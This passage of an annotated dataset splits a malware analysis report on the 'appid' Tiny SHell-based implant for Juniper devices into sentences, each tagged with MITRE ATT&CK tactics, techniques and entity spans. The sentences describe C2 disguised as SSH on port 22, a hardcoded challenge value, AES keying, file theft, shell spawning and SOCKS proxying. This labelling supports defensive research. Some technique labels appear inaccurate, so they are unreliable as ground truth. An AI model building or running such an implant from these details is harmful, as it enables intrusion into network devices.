[ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Hardcoded 16-byte challenge value for C2 authentication", "entities": [ { "text": "16-byte challenge value", "start": 28, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x080531cc", "start": 65, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "value \\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\x 1d\\xde\\x58\\x0d", "start": 97, "end": 168, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s351-e816bb", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 351, "context_before": "Challenge Value A hardcoded 16-byte challenge value was found at virtual address 0x080531cc with value \\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\x 1d\\xde\\x58\\x0d Malware Activation Logic", "sentence_text": "The appid implant sets up global variables to contain the various hard-coded IP addresses listed in the artifacts section.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Setup global variables with hard-coded C2 IP addresses", "entities": [ { "text": "appid implant", "start": 4, "end": 17, "label": "MalwareTool" }, { "text": "sets up global variables", "start": 18, "end": 42, "label": "Action" }, { "text": "hard-coded IP addresses", "start": 66, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s352-8c25cc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 352, "context_before": "The appid implant sets up global variables to contain the various hard-coded IP addresses listed in the artifacts section.", "sentence_text": "Further, it attempts to read the value stored in the eth environment variable and stores this value in a global variable (to indicate the outbound interface).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Read eth environment variable for outbound interface configuration", "entities": [ { "text": "read the value stored in the eth environment variable", "start": 24, "end": 77, "label": "Action" }, { "text": "stores this value in a global variable", "start": 82, "end": 120, "label": "Action" }, { "text": "outbound interface", "start": 138, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "eth environment variable", "start": 53, "end": 77, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s353-a4e68d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 353, "context_before": "Further, it attempts to read the value stored in the eth environment variable and stores this value in a global variable (to indicate the outbound interface).", "sentence_text": "Finally, it sets the connection port to 22, presumably to mask any outbound connections to C2 servers as legitimate SSH connections.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Set connection port to 22 to mask C2 as SSH traffic", "entities": [ { "text": "sets the connection port to 22", "start": 12, "end": 42, "label": "Action" }, { "text": "mask any outbound connections to C2 servers as legitimate SSH connections.", "start": 58, "end": 132, "label": "Action" }, { "text": "port to 22", "start": 32, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s354-7fa8d2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 354, "context_before": "Finally, it sets the connection port to 22, presumably to mask any outbound connections to C2 servers as legitimate SSH connections.", "sentence_text": "Connect to C2 The appid implant then selects one of the 4 \"Connect Back\" IPs to connect to at random.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Randomly select one of 4 Connect Back IPs for C2 connection", "entities": [ { "text": "appid implant", "start": 18, "end": 31, "label": "MalwareTool" }, { "text": "Connect to C2", "start": 0, "end": 13, "label": "Action" }, { "text": "selects one of the 4 \"Connect Back\" IPs to connect to at random.", "start": 37, "end": 101, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p24-s355-e1ac13", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 355, "context_before": "Connect to C2 The appid implant then selects one of the 4 \"Connect Back\" IPs to connect to at random.", "sentence_text": "Then it creates a TCP socket to connect to this address.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Create TCP socket to connect to selected C2 address", "entities": [ { "text": "connect to this address.", "start": 32, "end": 56, "label": "Action" }, { "text": "creates a TCP socket", "start": 8, "end": 28, "label": "Action" }, { "text": "TCP socket", "start": 18, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s356-bd056e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 356, "context_before": "Then it creates a TCP socket to connect to this address.", "sentence_text": "After this is done, the outbound interface for the socket is set to the value obtained from the eth environment variable.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Set outbound interface from eth environment variable for socket", "entities": [ { "text": "outbound interface for the socket is set ", "start": 24, "end": 65, "label": "Action" }, { "text": "eth environment variable.", "start": 96, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "outbound interface", "start": 24, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s357-8a4e96", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 357, "context_before": "After this is done, the outbound interface for the socket is set to the value obtained from the eth environment variable.", "sentence_text": "If the connection is successful, the implant then attempts to connect to the C2 in server mode.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Connect to C2 in server mode after successful connection", "entities": [ { "text": " implant", "start": 36, "end": 44, "label": "MalwareTool" }, { "text": "attempts to connect to the C2 in server mode.", "start": 50, "end": 95, "label": "Action" }, { "text": "server mode.", "start": 83, "end": 95, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s358-c0383a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 358, "context_before": "If the connection is successful, the implant then attempts to connect to the C2 in server mode.", "sentence_text": "Otherwise, the appid becomes the server and becomes ready to receive commands from the C2.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Become C2 server and ready to receive commands", "entities": [ { "text": "appid", "start": 15, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "becomes the server", "start": 21, "end": 39, "label": "Action" }, { "text": "ready to receive commands from the C2.", "start": 52, "end": 90, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p24-s359-20a0dd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 359, "context_before": "Otherwise, the appid becomes the server and becomes ready to receive commands from the C2.", "sentence_text": "From the decompiled sources of appid it seems only this execution path is taken.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p24-s360-7e293a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 360, "context_before": "From the decompiled sources of appid it seems only this execution path is taken.", "sentence_text": "This means that this implant is intended to act as a command-receiving server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Implant intended to act as command-receiving server", "entities": [ { "text": "implant", "start": 21, "end": 28, "label": "MalwareTool" }, { "text": "act as a command-receiving server.", "start": 44, "end": 78, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p24-s361-8d56b9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 361, "context_before": "This means that this implant is intended to act as a command-receiving server.", "sentence_text": "Activate and Listen for Commands Once the appid is started in server mode, it receives 1 byte from the C2 client using the pel_recv_msg() API from Tiny SHell.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Receive commands from C2 client using pel_recv_msg API in server mode.", "entities": [ { "text": "appid", "start": 42, "end": 47, "label": "MalwareTool" }, { "text": "receives 1 byte from the C2 client using the pel_recv_msg() API from Tiny SHell", "start": 78, "end": 157, "label": "Action" }, { "text": "C2 client", "start": 103, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "pel_recv_msg() API", "start": 123, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "Tiny SHell", "start": 147, "end": 157, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p24-s362-355307", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 362, "context_before": "Activate and Listen for Commands Once the appid is started in server mode, it receives 1 byte from the C2 client using the pel_recv_msg() API from Tiny SHell.", "sentence_text": "If this receive is successful, the command processing logic can begin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p24-s363-9113ce", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 363, "context_before": "If this receive is successful, the command processing logic can begin.", "sentence_text": "This single byte message contains the action to be taken by the implant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p24-s364-4fa4a1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 364, "context_before": "This single byte message contains the action to be taken by the implant.", "sentence_text": "These actions are explained in the \"Command Details\" section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p24-s365-5d91a9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 365, "context_before": "These actions are explained in the \"Command Details\" section.", "sentence_text": "Note that the appid server created in this situation is initialized using the pel_server_init() API from TinySHell using the \"PEL secret\" in the \"Artifacts Found\" section above.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Initialize appid server using pel_server_init() API with PEL secret", "entities": [ { "text": "appid server", "start": 14, "end": 26, "label": "MalwareTool" }, { "text": " initialized using the pel_server_init() API", "start": 55, "end": 99, "label": "Action" }, { "text": "PEL secret", "start": 126, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "TinySHell", "start": 105, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s366-81b270", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 366, "context_before": "Note that the appid server created in this situation is initialized using the pel_server_init() API from TinySHell using the \"PEL secret\" in the \"Artifacts Found\" section above.", "sentence_text": "This serves as the encryption/decryption key for the aes_encrypt() and aes_decrypt() routines in TinyShell.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Use PEL secret as encryption key for aes_encrypt()/aes_decrypt() routines", "entities": [ { "text": "encryption/decryption key", "start": 19, "end": 44, "label": "Infrastructure_Indicator" }, { "text": "TinyShell.", "start": 97, "end": 107, "label": "Infrastructure_Indicator" }, { "text": " aes_encrypt() and aes_decrypt() routines", "start": 52, "end": 93, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s367-1dfc44", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 367, "context_before": "This serves as the encryption/decryption key for the aes_encrypt() and aes_decrypt() routines in TinyShell.", "sentence_text": "Command Details\nLike previously seen malware implants, appid at its core is a Remote Access Toolkit (RAT) based on Tiny Shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p24-s368-56e988", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 368, "context_before": "Command Details\nLike previously seen malware implants, appid at its core is a Remote Access Toolkit (RAT) based on Tiny Shell.", "sentence_text": "It uses the following Tiny Shell APIs to perform the corresponding actions:\n1. tshd_get_file() – Read a file.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read file using tshd_get_file() API", "entities": [ { "text": "Read a file.", "start": 97, "end": 109, "label": "Action" }, { "text": "tshd_get_file()", "start": 79, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s369-24f519", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 369, "context_before": "It uses the following Tiny Shell APIs to perform the corresponding actions:\n1. tshd_get_file() – Read a file.", "sentence_text": "2. tshd_put_file() – Write a file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write file using tshd_put_file() API", "entities": [ { "text": "Write a file", "start": 21, "end": 33, "label": "Action" }, { "text": "tshd_put_file()", "start": 3, "end": 18, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s370-fbd5f5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 370, "context_before": "2. tshd_put_file() – Write a file.", "sentence_text": "3. tshd_runshell() – Start a shell.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Start shell using tshd_runshell() API", "entities": [ { "text": "tshd_runshell()", "start": 3, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "Start a shell", "start": 21, "end": 34, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p24-s371-18619e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 371, "context_before": "3. tshd_runshell() – Start a shell.", "sentence_text": "The intimate details of these commands can be understood from the Tiny SHell sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p24-s372-1252d2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 372, "context_before": "The intimate details of these commands can be understood from the Tiny SHell sources.", "sentence_text": "However, there are two new APIs introduced to Tiny SHell that are used to create a SOCKS proxy and update the in-memory configuration of the appid implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Create SOCKS proxy and update in-memory configuration via new APIs", "entities": [ { "text": "create a SOCKS proxy", "start": 74, "end": 94, "label": "Action" }, { "text": "update the in-memory configuration", "start": 99, "end": 133, "label": "Action" }, { "text": "new APIs", "start": 23, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "appid implant.", "start": 141, "end": 155, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p25-s373-9c4442", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 373, "context_before": "However, there are two new APIs introduced to Tiny SHell that are used to create a SOCKS proxy and update the in-memory configuration of the appid implant.", "sentence_text": "Command 1: tshd_get_file()", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Execute tshd_get_file() command for file reading", "entities": [ { "text": "Command 1", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "tshd_get_file()", "start": 11, "end": 26, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s374-9ba2c6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 374, "context_before": "Command 1: tshd_get_file()", "sentence_text": "As the name suggests, this command is used to read an arbitrary file from the file system.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read arbitrary file from file system", "entities": [ { "text": "read an arbitrary file from the file system.", "start": 46, "end": 90, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p25-s375-b6f17c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 375, "context_before": "As the name suggests, this command is used to read an arbitrary file from the file system.", "sentence_text": "More details on this can be obtained by looking at the TinyShell source code here:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p25-s376-40f631", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 376, "context_before": "More details on this can be obtained by looking at the TinyShell source code here:", "sentence_text": "Command 2: tshd_put_file()", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Execute tshd_put_file() command for file writing", "entities": [ { "text": "tshd_put_file()", "start": 11, "end": 26, "label": "Infrastructure_Indicator" }, { "text": "Command 2", "start": 0, "end": 9, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s377-ba4540", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 377, "context_before": "Command 2: tshd_put_file()", "sentence_text": "As the name suggests, this command is used to write an arbitrary file on the file system.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write arbitrary file to file system", "entities": [ { "text": "write an arbitrary file on the file system.", "start": 46, "end": 89, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p25-s378-5a9dc6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 378, "context_before": "As the name suggests, this command is used to write an arbitrary file on the file system.", "sentence_text": "More details on this command can be obtained by looking at the TinyShell source code here:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p25-s379-8f27e0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 379, "context_before": "More details on this command can be obtained by looking at the TinyShell source code here:", "sentence_text": "Command 3: tshd_runshell()", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Execute tshd_runshell() command for shell execution", "entities": [ { "text": "Command 3", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "tshd_runshell()", "start": 11, "end": 26, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s380-2c8db9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 380, "context_before": "Command 3: tshd_runshell()", "sentence_text": "As the name suggests, this command is used to start a /bin/sh shell with history turned off.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Start /bin/sh shell with history disabled", "entities": [ { "text": "start a /bin/sh shel", "start": 46, "end": 66, "label": "Action" }, { "text": "history turned off.", "start": 73, "end": 92, "label": "Action" }, { "text": "/bin/sh", "start": 54, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s381-da6d4e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 381, "context_before": "As the name suggests, this command is used to start a /bin/sh shell with history turned off.", "sentence_text": "More details on this command can be obtained by looking at the TinyShell source code here:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p25-s382-5b1a3d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 382, "context_before": "More details on this command can be obtained by looking at the TinyShell source code here:", "sentence_text": "Command 4: tshd_setproxy()\nThis command is used to execute a custom API tshd_setproxy().", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p25-s383-b89567", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 383, "context_before": "Command 4: tshd_setproxy()\nThis command is used to execute a custom API tshd_setproxy().", "sentence_text": "This API is used to create a SOCKS proxy between two IP addresses.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Create SOCKS proxy between two IP addresses", "entities": [ { "text": "create a SOCKS proxy", "start": 20, "end": 40, "label": "Action" }, { "text": "SOCKS proxy", "start": 29, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "between two IP addresses.", "start": 41, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s384-e8f243", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 384, "context_before": "This API is used to create a SOCKS proxy between two IP addresses.", "sentence_text": "One IP address is received from the C2 (which the appid implant can presumably reach).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Receive target IP address from C2 for SOCKS proxy", "entities": [ { "text": "IP address is received from the C2", "start": 4, "end": 38, "label": "Action" }, { "text": "appid implant can presumably reach", "start": 50, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s385-955301", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 385, "context_before": "One IP address is received from the C2 (which the appid implant can presumably reach).", "sentence_text": "The other IP address is a randomly selected IP address from the appid's in-memory configuration.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Select random IP from in-memory configuration for SOCKS proxy", "entities": [ { "text": "randomly selected IP address", "start": 26, "end": 54, "label": "Action" }, { "text": "appid's ", "start": 64, "end": 72, "label": "MalwareTool" }, { "text": "in-memory configuration.", "start": 72, "end": 96, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s386-046994", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 386, "context_before": "The other IP address is a randomly selected IP address from the appid's in-memory configuration.", "sentence_text": "The connection is made over an interface received from the C2 client.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Make connection over interface received from C2 client", "entities": [ { "text": "connection is made over an interface", "start": 4, "end": 40, "label": "Action" }, { "text": "interface received from the C2 client.", "start": 31, "end": 69, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s387-f5b3e4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 387, "context_before": "The connection is made over an interface received from the C2 client.", "sentence_text": "The complete decompiled source code for the tshd_setproxy() API can be found in Appendix B.\nCommand 5: tshd_config()", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p25-s388-4c35bb", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 388, "context_before": "The complete decompiled source code for the tshd_setproxy() API can be found in Appendix B.\nCommand 5: tshd_config()", "sentence_text": "The appid contains an in-memory configuration which includes the following fields:\nField Description\nCB IP 1 An IP Address to connect back to in client mode CB", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "In-memory configuration with connect-back IP addresses", "entities": [ { "text": "appid ", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": " in-memory configuration", "start": 21, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "CB IP 1", "start": 101, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "client mode CB", "start": 145, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "IP Address to connect back to", "start": 112, "end": 141, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s390-fb1bd9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 390, "context_before": "IP 2", "sentence_text": "An IP Address to connect back to in client mode CB", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Additional connect-back IP address for client mode", "entities": [ { "text": "IP Address to connect back to", "start": 3, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "client mode CB", "start": 36, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s392-95d5e8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 392, "context_before": "IP 3", "sentence_text": "An IP Address to connect back to in client mode CB IP 4 An IP Address to connect back to in client mode CB PORT", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Multiple connect-back IPs and port configuration for client mode", "entities": [ { "text": "IP Address to connect back to", "start": 3, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "client mode", "start": 36, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "CB IP 4 ", "start": 48, "end": 56, "label": "Infrastructure_Indicator" }, { "text": " CB PORT", "start": 103, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s393-c890c5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 393, "context_before": "An IP Address to connect back to in client mode CB IP 4 An IP Address to connect back to in client mode CB PORT", "sentence_text": "The port to connect back to in client mode CB Interface", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Configure port and interface for client mode connect-back", "entities": [ { "text": " port to connect back to", "start": 3, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "client mode", "start": 31, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "CB Interface", "start": 43, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s394-8849e5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 394, "context_before": "The port to connect back to in client mode CB Interface", "sentence_text": "The interface to be used for connections DELAY TIME", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Configure interface for connections and delay time", "entities": [ { "text": "interface to be used for connections", "start": 4, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "DELAY TIME", "start": 41, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p25-s395-933365", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 25, "sentence_id": 395, "context_before": "The interface to be used for connections DELAY TIME", "sentence_text": "The delay time prior to start up", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1029", "name": "Scheduled Transfer" } ], "procedure": "Configure delay time prior to startup", "entities": [ { "text": "delay time prior to start up", "start": 4, "end": 32, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p26-s396-da8678", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 396, "context_before": "The delay time prior to start up", "sentence_text": "The initial values for these fields are hard-coded into the appid binary.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Hard-coded initial values for configuration fields", "entities": [ { "text": "initial values for these fields are hard-coded", "start": 4, "end": 50, "label": "Action" }, { "text": "the appid binary.", "start": 56, "end": 73, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p26-s397-3fac4f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 397, "context_before": "The initial values for these fields are hard-coded into the appid binary.", "sentence_text": "However, these values can be changed at any time using the tshd_config() API which can be triggered using this command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p26-s398-7da6be", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 398, "context_before": "However, these values can be changed at any time using the tshd_config() API which can be triggered using this command.", "sentence_text": "The assumption is that a custom TinyShell Client is used to communicate with this implant.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Custom TinyShell client is used to communicate with the implant for remote control.", "entities": [ { "text": "TinyShell Client", "start": 32, "end": 48, "label": "MalwareTool" }, { "text": "is used to communicate with this implant", "start": 49, "end": 89, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p26-s399-d608b7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 399, "context_before": "The assumption is that a custom TinyShell Client is used to communicate with this implant.", "sentence_text": "Call Graph\nThe call graph for the appid implant is given below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p26-s400-eaeed6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 26, "sentence_id": 400, "context_before": "Call Graph\nThe call graph for the appid implant is given below.", "sentence_text": "Junos OS Specific Actions The hardcoded interface name ge-0/2/8.0 is an indicator that this implant is designed specifically for Junos OS since this interface is available only on Juniper Networks' devices.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Target Junos OS using Juniper-specific interface ge-0/2/8.0", "entities": [ { "text": "hardcoded interface name ge-0/2/8.0", "start": 30, 